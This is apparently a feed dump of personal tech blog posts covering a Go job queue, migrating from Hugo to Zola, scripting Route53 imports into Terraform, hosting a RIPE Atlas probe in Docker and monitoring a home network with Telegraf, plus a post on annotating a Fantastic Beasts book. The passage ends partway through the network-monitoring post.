There are tonnes of libraries and posts out there doing overly complicated stuff; however, if your need is pretty minimal or you want to understand the concepts from the ground up, this post aims to do just that and nothing more.\nWe’ll be using concepts like WaitGroups, Channels and Contexts to build our own job queuing mechanism. It primarily involves 2 components:\nQueue: A queue which has a list of items waiting to be processed.\nWorker: A worker constantly listening to that queue and processing the events as desired.\nWith these 2 main ideas behind us, let us create our sample structure:\npackage dispatch\n\ntype Dispatcher interface {\n\t\u002F\u002F Push takes an Event and pushes it to a queue.\n\tPush(Event) error\n\t\u002F\u002F Run spawns the workers and waits indefinitely for\n\t\u002F\u002F the events to be processed.\n\tRun(ctx context.Context)\n}\n\n\u002F\u002F EventDispatcher represents the datastructure for an\n\u002F\u002F EventDispatcher instance. This struct satisfies the\n\u002F\u002F Dispatcher interface.\ntype EventDispatcher struct {\n\tOpts     Options\n\tQueue    chan Event\n\tFinished bool\n}\n\n\u002F\u002F Options represent options for EventDispatcher.\ntype Options struct {\n\tMaxWorkers   int \u002F\u002F Number of workers to spawn.\n\tMaxQueueSize int \u002F\u002F Maximum length for the queue to hold events.\n}\n\n\u002F\u002F NewEventDispatcher initialises a new event dispatcher.\n\u002F\u002F It returns a pointer, since Push and Run are defined on\n\u002F\u002F pointer receivers.\nfunc NewEventDispatcher(opts Options) Dispatcher {\n\treturn &EventDispatcher{\n\t\tOpts:     opts,\n\t\tQueue:    make(chan Event, opts.MaxQueueSize),\n\t\tFinished: false,\n\t}\n}\nPushing to Queue#\nNow that we have our basic structure ready, let’s write a function to push events to the queue.\nA queue is simply a channel. We have created a new queue of size MaxQueueSize while initialising the EventDispatcher.\nQueue: make(chan Event, opts.MaxQueueSize)\nTo push events into it, we’ll simply do: d.Queue \u003C- event. This adds a new item (event) of type Event to our queue.\n\u002F\u002F Push adds a new event payload to the queue.\nfunc (d *EventDispatcher) Push(event Event) error {\n\tif d.Finished {\n\t\treturn errors.New(`queue is closed`)\n\t}\n\td.Queue \u003C- event\n\treturn nil\n}\nListening to Queue#\nSo the client is calling Push() on our EventDispatcher and events are being pushed into the channel. But there’s no one reading from this channel so far. Let’s fix that by spawning workers, who will listen on the channel indefinitely and process the events:\nfor {\n    select {\n    case event := \u003C-d.Queue:\n        event.Process()\n    }\n}\nIn the above snippet, we are simply looping indefinitely to scan through all items in the queue. 
event := \u003C-d.Queue is basically fetching an item from the channel and assigning it to the event variable.\nevent.Process() is a dummy function, but it basically indicates that whatever processing needs to be done should be handled here.\nRight now, you’ll be wondering two things:\nIf this is an infinite loop, how do we guarantee it runs forever?\nHow do I spawn more workers if I need concurrency?\nTo address these problems, let’s add WaitGroups and Goroutines to our mix.\nWaitGroups will help us keep a count of the workers which have been spawned, and until each one of them finishes processing, wg.Wait() will keep blocking.\nAnd to bring in more workers, we’ll simply spawn them with Goroutines:\ngo func() {\n\tfor {\n\t\tselect {\n\t\tcase event := \u003C-d.Queue:\n\t\t\tevent.Process()\n\t\t}\n\t}\n}()\nNow, spawning n Goroutines is just a matter of a simple for loop over this:\nfor i := 0; i \u003C d.Opts.MaxWorkers; i++ {\n\twg.Add(1) \u002F\u002F Add a wait group for each worker.\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase event := \u003C-d.Queue:\n\t\t\t\tevent.Process()\n\t\t\t}\n\t\t}\n\t}()\n}\nPerfect! But hang on! We have missed a critical thing. How do we handle cancellations? For eg, when your program shuts down, we should clean up all the Goroutines spawned and process the remaining messages in the queue. For that, we need to listen to a cancellation channel. The only purpose of this channel is to listen for SIGINT or SIGTERM signals, and whenever either of them is received, we should flush our events.\nHere’s how the client would initialise a context:\n\u002F\u002F Create a channel to relay `SIGINT` and `SIGTERM` signals.\ncloseChan := make(chan os.Signal, 1)\nsignal.Notify(closeChan, os.Interrupt, syscall.SIGTERM)\nctx, cancel := context.WithCancel(context.Background())\nAnd in the main thread, the client would block on the closeChan channel like:\n\u002F\u002F Listen on close channel indefinitely until a\n\u002F\u002F `SIGINT` or `SIGTERM` is received.\n\u003C-closeChan\n\u002F\u002F Cancel the context to gracefully shutdown.\ncancel()\nWhen cancel() is called, it does something special. It closes the ctx.Done() channel, which unblocks any receive on it. We can listen to this channel in the .Run() function and flush pending events accordingly:\ncase \u003C-ctx.Done():\n\t\u002F\u002F Ensure no new messages are added.\n\td.Finished = true\n\t\u002F\u002F Flush all pending events here (implementation specific).\n\t\u002F\u002F This Goroutine has finished processing.\n\twg.Done()\n\treturn\nStitching all the pieces together, we finally have:\npackage dispatch\n\nimport (\n\t\"context\"\n\t\"errors\"\n\t\"sync\"\n)\n\ntype Dispatcher interface {\n\t\u002F\u002F Push takes an Event and pushes it to a queue.\n\tPush(Event) error\n\t\u002F\u002F Run spawns the workers and waits indefinitely for\n\t\u002F\u002F the events to be processed.\n\tRun(ctx context.Context)\n}\n\n\u002F\u002F EventDispatcher represents the datastructure for an\n\u002F\u002F EventDispatcher instance. 
This struct satisfies the\n\u002F\u002F Dispatcher interface.\ntype EventDispatcher struct {\n\tOpts     Options\n\tQueue    chan Event\n\tFinished bool\n}\n\n\u002F\u002F Options represent options for EventDispatcher.\ntype Options struct {\n\tMaxWorkers   int \u002F\u002F Number of workers to spawn.\n\tMaxQueueSize int \u002F\u002F Maximum length for the queue to hold events.\n}\n\n\u002F\u002F NewEventDispatcher initialises a new event dispatcher.\nfunc NewEventDispatcher(opts Options) Dispatcher {\n\treturn &EventDispatcher{\n\t\tOpts:     opts,\n\t\tQueue:    make(chan Event, opts.MaxQueueSize),\n\t\tFinished: false,\n\t}\n}\n\n\u002F\u002F Push adds a new event payload to the queue.\nfunc (d *EventDispatcher) Push(event Event) error {\n\tif d.Finished {\n\t\treturn errors.New(`queue is closed`)\n\t}\n\td.Queue \u003C- event\n\treturn nil\n}\n\n\u002F\u002F Run spawns workers and listens to the queue.\n\u002F\u002F It's a blocking function and waits for a cancellation\n\u002F\u002F invocation from the Client.\nfunc (d *EventDispatcher) Run(ctx context.Context) {\n\twg := sync.WaitGroup{}\n\tfor i := 0; i \u003C d.Opts.MaxWorkers; i++ {\n\t\twg.Add(1) \u002F\u002F Add a wait group for each worker.\n\t\t\u002F\u002F Spawn a worker.\n\t\tgo func() {\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase \u003C-ctx.Done():\n\t\t\t\t\t\u002F\u002F Ensure no new messages are added.\n\t\t\t\t\td.Finished = true\n\t\t\t\t\t\u002F\u002F Flush all pending events here (implementation specific).\n\t\t\t\t\twg.Done()\n\t\t\t\t\treturn\n\t\t\t\tcase e := \u003C-d.Queue:\n\t\t\t\t\te.Process()\n\t\t\t\t}\n\t\t\t}\n\t\t}()\n\t}\n\twg.Wait()\n}\nThis post doesn’t cover how to flush or process the events as these are implementation specific details.\nThis is a pretty barebones structure and you can modify the code according to your usecase.\nFin!",[],{"slug":2143,"title":2144,"link":2145,"pubDate":2146,"contentSnippet":2147,"tags":2148,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"fantastic-beasts-graffiti","Writing on books - Fantastic Beasts and Where to Find Them","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F11\u002F29\u002Ffantastic-beasts-graffiti\u002F","2020-11-29T00:00:00.000Z","“Fantastic Beasts and Where to Find Them” is a curious book:\nThe in-universe book is written by Newt Scamander and was published in 1927.\nThe first edition of the companion book was published in 2001. This is apparently the 52nd in-universe edition with a foreword from Dumbledore, and it was released to the muggle world for charity.\nThe 2001 edition pretends to be Harry’s copy of the book as of the end of Harry’s 4th year at Hogwarts. As such it includes hand-written comments from the trio. (Yes, Hermione writes on books!)\nHowever, with the release of the film of the same name in 2016, a new edition was released with lots of changes:\n6 new beasts that made an appearance in the film were added to the book[1]:\nHidebehind\nHodag\nHorned Serpent\nSnallygaster\nThunderbird\nWampus cat\nThe hand-lettering was removed.\nDumbledore’s foreword is removed from the book, in favor of an in-universe foreword from Newt Scamander.\nThe “About the Author” section changes Newt’s background. 
He no longer graduates from Hogwarts, just “leaves” it, as portrayed in the film.\nAll of these changes are meant to fix the book’s inconsistencies with the canon; however, that also makes the book much less charming. I got myself a copy of the Hogwarts Library boxset a few years ago, which includes the newer edition of the book (Bloomsbury) - that means no witty comments from Ron.\nSince it didn’t have the hand-lettering, I took it upon myself to fix that mistake. Thankfully, lists of all the comments in the 2001 edition are available on the internet. The trickiest part was the “this book belongs to” page, which is missing from the newer edition. I ended up creating a faux-library card for that instead.\nHere is what it looks like:\nRon plays hangman and loses.\nHermione writes on books!\nThanks to Bhavya for helping with the troll illustration.\n[1] I didn’t like the new additions; they sound less like a textbook and more like a transcript of what happened in the film.",[],{"slug":2150,"title":2151,"link":2152,"pubDate":2153,"contentSnippet":2154,"tags":2155,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"analysis-paralysis","Analysis Paralysis - CrashLoopBackoff","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fanalysis-paralysis\u002F","2020-11-27T02:40:55.000Z","Have you ever been stuck in a situation where you’ve spent countless hours digging through a lot of options, overthinking their pros\u002Fcons and having a tough time deciding?\nIf yes, I’ve been in the same boat myself, and the more I think about it, the more I think it’s causing some serious issues with my productivity. Since I’ve started to self-host a lot of services, I’m overthinking and overanalysing the software choices available to do a certain task. For eg, a personal wiki sounds like such a simple and common use case, but I’ve personally tried countless options. I’ve read and searched for these discussions on Lobsters\u002FHN\u002FReddit discussion boards, and that has been a real time sink for me, now that I look back. I’ll try an option for maybe a week or two at best and then jump on to something else in search of the perfect solution.\nIt’s hard for me to stick to a solution. And it’s even more embarrassing when you tell your friends about the “latest new distro” you’re using, announce it to the world on Twitter, and when someone asks, “hey how’s that OS working for you” after a month, you tell them “Oh, I switched from it last week”. I’m not making any of this up; I’ve been in these shoes myself and honestly it’s not a good feeling.\nIn the search for the perfect I tend to lose sight of things that are important. Things which are slow and boring but work are more reliable than software which changes fast and breaks often. I want to fail cheap and quickly rather than spending a lot of time and still eventually failing.\nNo, this post doesn’t have any answers on how to fix this problem. Well, if I knew them myself then I’d not be writing this but giving a TEDx talk on it. These are just my observations and something that I intend to actively fix.\nBoring is better. I want to stick to stable choices when it comes to trivial things in life. I don’t wanna seek excitement or joy from switching to a cool new distro, but instead from actually doing some important project at my work or building my side projects – something that gives me a genuine feeling of happiness. 
After all grass always seems to look greener on the other side.\nI don’t usually pen down my thoughts like these, but I want to refer to this public post as a reminder for myself the next time I’m about to make the same mistake.\nFin.\nUPDATE (2021-11-02): There’s a really nice video I came across today on the same subject. I’d highly recommend you to give this a listen if you found the above post relatable.",[],{"slug":2157,"title":2158,"link":2159,"pubDate":2160,"contentSnippet":2161,"tags":2162,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"migrating-to-zola","Migrating my blog to Zola","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fmigrating-to-zola\u002F","2020-11-08T02:40:55.000Z","I’ve been writing on this blog for about 2 years now. This has been the longest I’ve stuck on to the same technology stack for my blog. I’ve previously jumped from a Jekyll based static site to a Medium blog before finally settling for Hugo.\nI’ve been using Hugo since 2018 but I don’t recall as to why I went ahead with it. Maybe it was increasingly popular at that time and everyone touted Hugo as the solution to Static Site Generator (referred to as SSG from here on). There are 1000s of SSGs and at least a dozen of websites which lists all the SSGs out there. This is crazy by any standards. Hugo started as a generic blog generator but over the years it has become a website generator. It’s no longer aimed at people who just want to have a small little static website\u002Fblog but supports all the use cases for people building full-fledged static websites. IMHO these two goals are overarching however this has resulted in a simple project to become incredibly complex over time.\nTipping Point#\nAnyway, so I wanted to change the look of the homepage on my website so I decided to look at Hugo’s documentation. Hugo’s documentation is great for someone who knows what exactly are they looking for. The documentation is so huge that you simply cannot grok it in one evening. I had zero ideas on how to customise the damn homepage of my blog and after spending hours buried in the documentation I was able to kind of figure the solution but it was unintuitive, to say the least. Apparently, to override any template from the theme, you have to mirror the directory structure of the theme in your root directory. Which meant, I needed to look at the source code of the theme, figure out the project structure, copy-paste all the folder names and put my override of index.html there. Which, BTW magically overrides it. This whole magic thing is BS and I am being strongly opinionated here.\nThere is more than one way to do something in Hugo. Different theme authors use different styles, which makes the whole thing even more complex. It also means for my customisations to work across themes, well you guessed it right: it’s impossible.\nRecently I discovered that I was unable to preview my Hugo website locally without internet because I had a Twitter shortcode in one of my blog post (which makes an API call to Twitter to render a nice card preview). The site completely failed to render instead of just logging a warning. Bollocks.\nThe tipping point for me, however, was when the theme I was using stopped working with the latest version of Hugo at that point. So, picture this – You make dozens of custom changes and then one update just breaks your website. Now not only you have to fix your shit but the theme you were using, you’ve to make upstream changes to the theme or maintain your own fork. 
And no, this is not a one-off experience. Hugo upgrades are a joke; they are known to break very, very often.\nI was done at this point. I didn’t want to deal with this BS of continuously fighting the generator for my blog.\nA fresh change#\nBeing a practitioner of Yak Shaving, I discussed the idea of a “tinyhugo” with Kailash and Sarat. We arrived at a spec and I started writing some code to pander to my NIH syndrome.\nHowever, I was still not convinced that a simpler solution didn’t exist. I spent countless hours exploring other alternatives. I’d used Lektor, Pelican and Eleventy before finally stumbling upon Zola via HN\u002FLobsters discussions. I’ve got to say, the landing page gave a fresh feeling - one that I’ve not seen with any other alternative. In fact, quite the opposite of the Eleventy landing page, which looks like an over-engineered piece of software to generate websites (not hating on it, there might be use cases for it, but the JS tooling and dependency system is something that I would not want to touch with a 10ft pole).\nZola’s primary appeal to me was that, like Hugo, it’s extremely fast and comes as a single-binary, no-dependency package. I looked at the docs and the first impression was that they are concise enough to get a basic idea. Zola is strongly opinionated, even to the extent of dictating a project structure and sometimes filenames too. I actually preferred this over the magic Hugo does. In less than 2 hours I was able to port the home page of my blog (and tweak it to my liking) in Zola. I decided to abandon my own tinyhugo attempt for the very fact that Zola fits my needs very well.\nThe thing that I really loved about Zola is how it enforces a separation between Sections and Pages. A section represents a “collection” of posts. So a blog can be a section, and I can have another section called “Book Reviews”. I could easily tell Zola where to look for the templates by specifying the same in content\u002Fbook_reviews\u002F_index.md. I don’t have to read Hugo docs or do Google-fu to figure this out; it’s right there in the docs and very apparent.\nFor the record, I still don’t know how to customise different templates for different sections in Hugo, but I couldn’t care less.\nMigration#\nThe migration was pretty straightforward – I had to copy the content folders of my blog (which are just a bunch of .md files) and replace the YAML frontmatter with TOML. There were a few variable changes that I needed to do manually, but since they were a manageable 20-25 posts, I did it by hand. I could potentially have automated it, but that way lies the deep rabbit hole of Yak Shaving. The good part was that I was able to retain the same URL structure for my new blog because the URL scheme was based on the file paths.\nI spent some time porting hugo-ink to Zola and did minor CSS tweaks to it. Zola uses the Tera language for templating and it’s much more pleasing to the eyes than the Go Template syntax. Zola comes with pretty neat features like Search, RSS\u002FAtom Feeds, Syntax Highlighting and SASS->CSS Processors.\nWhat took me time, however, was to figure out how to get opengraph tags on each page. Hugo provides a nifty template for this use case but Zola is pretty barebones like that. People who care a lot about SEO need to spend some extra effort here.\nFuture#\nZola is still a pretty new kid on the block but the author shares the same frustration about Hugo:\nit personally drives me insane, to the point of writing my own template engine and static site generator. Yes, this is a bit biased. 
– Source\nThis also reflects in the issues\u002FPRs I’ve seen for Zola, and the author is opinionated about not adding features which would make Zola complicated. Overall I am very happy with the switch and it was long overdue. I feel more confident in tweaking certain sections of my website. I plan to open-source the current theme in the next few days.\nYou can read the Source Code of this website if you’d like to explore how this website is built.\nFin!",[],{"slug":2164,"title":2165,"link":2166,"pubDate":2167,"contentSnippet":2168,"tags":2169,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"terraform-route53-import","Import existing Route53 records in Terraform","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fterraform-route53-import\u002F","2020-10-18T02:40:55.000Z","Terraform has a straightforward way of importing existing records (managed outside Terraform) via the terraform import command. The usage is documented here and works well if you have a handful of records to import. However, when you work with custom Terraform modules and have a whole bunch of records to be imported, you’ll look for ways to script the entire workflow. I did this a few weeks back at work and thought I’d share a solution which works well for my use case.\nHow it works#\nThe task consists of 3 parts:\n1. Fetch all existing records in a hosted zone using the AWS CLI.#\naws route53 list-resource-record-sets --hosted-zone-id XXX > data\u002Fcompany-tld.json\n# Loads the zone records in a dict\ndef load_records(zone_file=ZONE_FILE):\n    with open(zone_file) as record_file:\n        data = json.load(record_file)\n    return data\n2. Import the record in Terraform state.#\nTo do this, the Terraform CLI comes with an import command. However, for import to work, you need to have a resource declaration in your Terraform file already.\nFrom the official documentation:\nBecause of this, prior to running terraform import it is necessary to write manually a resource configuration block for the resource, to which the imported object will be mapped.\nTo overcome this restriction, we will create a dummy.tf and programmatically write the configuration block for each record.\n# Writes the dummy Terraform template which is required\n# before `terraform import` runs.\ndef template_dummy_file(resource_name):\n    add_dummy_record = Template(\n        \"\"\"\n\tresource \"aws_route53_record\" \"$resource_name\" {\n\t# (resource arguments)\n\t}\n\t\"\"\"\n    )\n    dummy_file_path = path.join(TERRAFORM_DIR, \"dummy.tf\")\n    with open(dummy_file_path, \"a\") as f:\n        f.write(add_dummy_record.substitute(resource_name=resource_name))\nThe aws_route53_record resource can be imported as described here. We will run this command as a subprocess.\n# Shells out `terraform import` command in the host OS.\ndef terraform_import(resource_name, resource_type):\n    import_command = f\"terraform import aws_route53_record.{resource_name} {ZONE_ID}_{resource_name}_{resource_type}\"\n    run(import_command, shell=True, check=True)\n3. (Optional) Move Resources in a Module#\nIn case you are using a Module to manage AWS Route53 resources, you’ll need to move the declaration from the resource to the module configuration block. This is described in more detail here.\nThe module declaration\u002Fnaming would depend on how the module is configured. To demonstrate: the module I use internally requires the name to be of the format resource_name-resource_type. 
To achieve this, you can call terraform state mv as a subprocess:\n# Shells out `terraform state mv` command in the host OS.\ndef terraform_move(resource_name, resource_type):\n    mv_command = f\"terraform state mv aws_route53_record.{resource_name} 'module.{MODULE_NAME}.aws_route53_record.route53_record[\\\"{resource_name}-{resource_type}\\\"]'\"\n    run(mv_command, shell=True, check=True)\nThat’s it! Running terraform plan should now show you the changes and if you imported every record correctly you should not see any drift from the real world state.\nYou can view the entire script here:\nimport json\nfrom os import getenv, path\nfrom string import Template\nfrom subprocess import run\nfrom sys import exit\n\n\nZONE_ID = getenv(\"ZONE_ID\")\nMODULE_NAME = getenv(\"MODULE_NAME\")\nZONE_FILE = getenv(\"ZONE_FILE\")\nTERRAFORM_DIR = getenv(\"TERRAFORM_DIR\")\n\n# Returns the variable key if not present in ENV.\ndef check_env_vars():\n    if not ZONE_FILE:\n        return \"$ZONE_FILE\"\n    if not ZONE_ID:\n        return \"$ZONE_ID\"\n    if not MODULE_NAME:\n        return \"$MODULE_NAME\"\n    if not TERRAFORM_DIR:\n        return \"$TERRAFORM_DIR\"\n    return \"\"\n\n\n# Loads the zone records in a dict\ndef load_records(zone_file=ZONE_FILE):\n    with open(zone_file) as record_file:\n        data = json.load(record_file)\n    return data\n\n\n# Writes the dummy Terraform template which is required\n# before `terraform import` runs.\ndef template_dummy_file(resource_name):\n    add_dummy_record = Template(\n        \"\"\"\n\tresource \"aws_route53_record\" \"$resource_name\" {\n\t# (resource arguments)\n\t}\n\t\"\"\"\n    )\n    dummy_file_path = path.join(TERRAFORM_DIR, \"dummy.tf\")\n    with open(dummy_file_path, \"a\") as f:\n        f.write(add_dummy_record.substitute(resource_name=resource_name))\n\n\n# Shells out `terraform import` command in the host OS.\ndef terraform_import(resource_name, resource_type):\n    import_command = f\"terraform import aws_route53_record.{resource_name} {ZONE_ID}_{resource_name}_{resource_type}\"\n    run(import_command, shell=True, check=True)\n\n\n# Shells out `terraform state mv` command in the host OS.\ndef terraform_move(resource_name, resource_type):\n    mv_command = f\"terraform state mv aws_route53_record.{resource_name} 'module.{MODULE_NAME}.aws_route53_record.route53_record[\\\"{resource_name}-{resource_type}\\\"]'\"\n    run(mv_command, shell=True, check=True)\n\n\nif __name__ == \"__main__\":\n    missing = check_env_vars()\n    if missing:\n        exit(f\"Required env variable {missing} is missing.\")\n    records = load_records()\n    for i in records.get(\"ResourceRecordSets\"):\n        resource_name = i.get(\"Name\")\n        resource_type = i.get(\"Type\")\n        template_dummy_file(resource_name)\n        terraform_import(resource_name, resource_type)\n        terraform_move(resource_name, resource_type)\n        print(f\"Imported {resource_name}\")\nHope this tiny Python script helps you transition your AWS Route53 records neatly and effortlessly!\nFin!",[],{"slug":2171,"title":2172,"link":2173,"pubDate":2174,"contentSnippet":2175,"tags":2176,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"ripe-atlas-probe-setup","Setting up a RIPE Atlas Probe","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fripe-atlas-probe-setup\u002F","2020-10-03T02:40:55.000Z","Twitter is an amazing thing! 
For all the shitposting and meme-ing that’s done there, there are some really cool people you get to interact with, which wouldn’t have been possible IRL. I happened to stumble upon Swapneel last year in Bangalore at a meetup. He occasionally posts about RIPE Atlas Probe measurements on his Twitter feed, and that made me curious to learn more about the Atlas Probe. Call it the Baader-Meinhof effect, but just when I was reading his blog post on RIPE Atlas, I found out about a Hasgeek workshop being conducted by Swapneel himself, and well, that’s how I basically got interested in setting up a probe myself.\nWhat is a RIPE Atlas Probe#\nA Probe is a device used to measure various metrics like DNS, SSL\u002FTLS, NTP, ping, traceroute etc. for an upstream target. A network of such probes is useful not just to internet researchers, network engineers, ISP operators and public activists, but also to common folks like me who are simply curious about the network\u002FWWW in general. The idea behind this is simple – you get some virtual credits for hosting a probe. You can make use of these credits to run your own measurements to gain insights about the health of your network. The data from these measurements is made publicly available by RIPE NCC and anyone can see the results.\nThere are 2 ways to host a Probe: Software and Hardware. Since the start of this year, RIPE Atlas has been available as software packages for various platforms. Before this, the only way to set up a Probe was to host a hardware probe by applying for one at the RIPE NCC website. These hardware probes have not been shipping to India for quite some time, as Swapneel mentioned, and if you’re in India, your only choice, for now, is to set up a software probe. A few key differences between the 2 kinds of probes:\nInitial Setup: The hardware probe is a plug-n-play device, no setup required. That makes it attractive for a lot of people, to just get a small device and host it.\nSpare Compute: For hosting a probe it is recommended that the probe stays online for as long as possible. This means you need to have some spare compute lying around, like a Raspberry Pi, a VM, a server etc. It’s not really recommended to host a probe on your laptop\u002Fdesktop - something which has an ad-hoc usage pattern. For people who don’t have any spare compute, a hardware probe is better suited.\nTampering Results: With the software probe, there are easy ways of tampering with the measurement results, which might give a bad data point to the people running the measurements. For eg, a software probe could tamper with the DNS queries for a particular upstream and fool you into believing that there’s a problem with the uplink or the upstream target.\nYou can read more about Probes here, and this FAQ section is highly recommended to clear all the basic doubts you might have about Probes.\nSetting up a Software Probe in a Container#\nWell, Containers are awesome! It’s easier to do a docker run than to figure out the installation instructions for your OS, ensure dependencies are installed and the 10 other things you have to do. So, I decided to use the jamesits\u002Fripe-atlas Docker image to host a probe on my RPi 4.\nHowever, in case you don’t want to use Containers for a reason best known to you, you can visit the official docs and find the instructions for your platform.\nYou can follow the steps below to set up a probe via Docker:\n1. Create a RIPE NCC Account#\nYou need to register for a RIPE NCC Access Account before proceeding further. Visit the registration page and create an account.\n2. 
2. Start the container#\ndocker run --detach --restart=always --log-opt max-size=10m \\\n        --cap-add=SYS_ADMIN --cap-add=NET_RAW --cap-add=CHOWN \\\n        --mount type=tmpfs,destination=\u002Fvar\u002Fatlasdata,tmpfs-size=64M \\\n        -v \u002Fvar\u002Fatlas-probe\u002Fetc:\u002Fvar\u002Fatlas-probe\u002Fetc \\\n        -v \u002Fvar\u002Fatlas-probe\u002Fstatus:\u002Fvar\u002Fatlas-probe\u002Fstatus \\\n        -e RXTXRPT=yes \\\n        --name ripe-atlas --hostname \"$(hostname --fqdn)\" \\\n        jamesits\u002Fripe-atlas:latest\nNOTE: Since I am running the Probe on my RPi, I am actually using the latest-armv7l tag for the jamesits\u002Fripe-atlas image. In case you are doing this on an amd64 machine, you should use the latest tag as shown above. You can find more options for the container here.\n3. Apply for a Software Probe#\nYou need to register for a software probe here and fill in the details as mentioned below.\n\nASN: You can find the ASN of your public IP by visiting ip2asn.com. You need to enter your public IP there, which you can find by visiting ifconfig.co.\n\nPublic Key: You need to fill in the public key generated by your Probe:\ncat \u002Fvar\u002Fatlas-probe\u002Fetc\u002Fprobe_key.pub\nNote: We are mounting the host path \u002Fvar\u002Fatlas-probe\u002Fetc inside the container at \u002Fvar\u002Fatlas-probe\u002Fetc. This ensures that if you stop\u002Fremove the container, your public\u002Fprivate key pair isn’t lost and there’s no need to regenerate the keys or apply for a Probe again. However, in case you do lose this, the Probe will attempt to generate a new pair and you might need to change the public key at that point. So be careful to take a backup of the generated key and store it somewhere safe.\nAfter submitting the form, you will receive an email which will have information about your Probe ID.\n\n4. Wait patiently#\nAfter filling the form you need to wait roughly 15 minutes for your probe to be added to the global network of Atlas Probes. You will receive an email saying your Probe is now live.\n\nCreating Measurements#\nIt’s pretty simple to create measurements, both via the UI and via a Python library developed by the RIPE community. For ease and convenience, I will demonstrate how to create a traceroute measurement from the UI itself:\nNote: You get around 15 Credits\u002Fminute for hosting a probe. In case you just deployed a probe you might not have enough credits to perform this measurement. You can come back later when you have sufficient credits.\nVisit the dashboard and head over to the Measurements tab. On clicking the Create a Measurement button you will be presented with a form with various options. Let’s try a Traceroute to mrkaran.dev for this measurement:\n\nTo limit the number of probes, I am going to select all Probes in India, by clicking on the +New Set -wizard option in the Probe Selection tab.\n\nAfter submitting the form, you will be presented with a Measurement ID which you can use to download the data at a later point as well.\n\nVisit the Measurement ID page and wait for a couple of minutes for all probes to perform the measurements:\n\nThat’s it! You can explore other types of Measurements and different options while performing them to customise your use case.
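\nIf you’d rather script your measurements, the Python library route works too: the community-maintained ripe-atlas-cousteau package. A minimal sketch of the same traceroute, based on my reading of its docs (the API key is one you generate in the RIPE Atlas dashboard):\nfrom ripe.atlas.cousteau import AtlasCreateRequest, AtlasSource, Traceroute\n\n# One-off IPv4 traceroute to mrkaran.dev from 10 probes in India.\ntraceroute = Traceroute(\n    af=4,\n    target=\"mrkaran.dev\",\n    description=\"Traceroute to mrkaran.dev\",\n    protocol=\"ICMP\",\n)\nsource = AtlasSource(type=\"country\", value=\"IN\", requested=10)\nrequest = AtlasCreateRequest(\n    key=\"YOUR_ATLAS_API_KEY\",  # needs the 'Measurement creation' permission\n    measurements=[traceroute],\n    sources=[source],\n    is_oneoff=True,\n)\nis_success, response = request.create()\nprint(is_success, response)  # the response carries the new Measurement ID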
\nSummary#\nAtlas Probes are pretty easy to host, and they are crucial in giving valuable insights about how different clients connect to upstreams and in spotting issues in networks. If you can host a probe, you should seriously consider doing so and help increase the number of probes in the network. As of today, the number of probes in India is just around 113, which is far too few.\nIf you need any help hosting one, don’t hesitate to contact me on my Twitter.\nOh, and for the record, I am currently hosting 2 Probes: Probe 1000991, hosted on my local RPi connected to my home network (ASN24560), and Probe 1001117, hosted on a DigitalOcean droplet in Bengaluru (ASN14061).\n\nFin!",[],{"slug":2178,"title":2179,"link":2180,"pubDate":2181,"contentSnippet":2182,"tags":2183,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"isp-monitoring","Monitoring my home network","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fisp-monitoring\u002F","2020-09-18T02:40:55.000Z","I like monitoring stuff. That’s what I do at work, so when my home ISP started giving me random problems, I decided it would be nice to monitor my home network as well. There are a couple of ways to go about this; a very popular OSS solution is SmokePing. SmokePing is written in Perl and is used to visualise network latencies. It’s quite a great solution, but for my current stack, which involves Prometheus and Grafana, it meant deploying a standalone tool separate from my monitoring stack - something I wanted to avoid.\n\nSo, I looked for other solutions and luckily happened to stumble upon oddtazz in one of the common Telegram groups, where he shared his solution for the above: the Telegraf ICMP plugin and Grafana. This was exactly what I’d been looking for, but for some reason I had wrongly assumed Telegraf needs InfluxDB to store the data. Googling a bit more, I found Telegraf supports the Prometheus format (amongst a huge list of others!), but this wasn’t so clear in their docs.\nI decided to run a Telegraf agent on my RPi connected to my home router over LAN, scrape the metrics using Prometheus, and visualise graphs in Grafana! For the impatient readers, here’s what my dashboard looks like:\n\n\nSetup#\nTo get started, we need to download Telegraf and configure the Ping plugin. Telegraf has the concept of Plugins for Input, Output, Aggregating and Processing. What this basically means is that you can configure multiple input plugins like DNS, ICMP, HTTP and export the data of these plugins in a format of your choice with Output plugins.\nThis makes Telegraf extremely extensible; you could even write a plugin (in Go) of your choice if you fancy that!\nHere’s what my telegraf.conf looks like:\n# Input plugins\n\n# Ping plugin\n[[inputs.ping]]\nurls = [\"mrkaran.dev\", \"tailscale.mrkaran.dev\", \"floyd.mrkaran.dev\", \"1.1.1.1\", \"kite.zerodha.com\", \"google.com\", \"reddit.com\", \"twitter.com\", \"amazon.in\", \"zerodha.com\"]\ncount = 4\nping_interval = 1.0\ntimeout = 2.0\n\n# DNS plugin\n[[inputs.dns_query]]\n  servers = [\"100.101.134.59\"]\n  domains = [\"mrkaran.dev\", \"tailscale.mrkaran.dev\", \"floyd.mrkaran.dev\", \"1.1.1.1\", \"kite.zerodha.com\", \"google.com\", \"reddit.com\", \"twitter.com\", \"amazon.in\", \"zerodha.com\"]\n\n# Output format plugins\n[[outputs.prometheus_client]]\n  listen = \":9283\"\n  metric_version = 2\nFirstly, it’s so nice to see an Ops tool not using YAML. Kudos to Telegraf for that. I’d love to see other tools follow suit.\nGetting back to the configuration part, the inputs.* sections declare the plugins to be configured, and I have configured the Ping and DNS plugins in my config. 
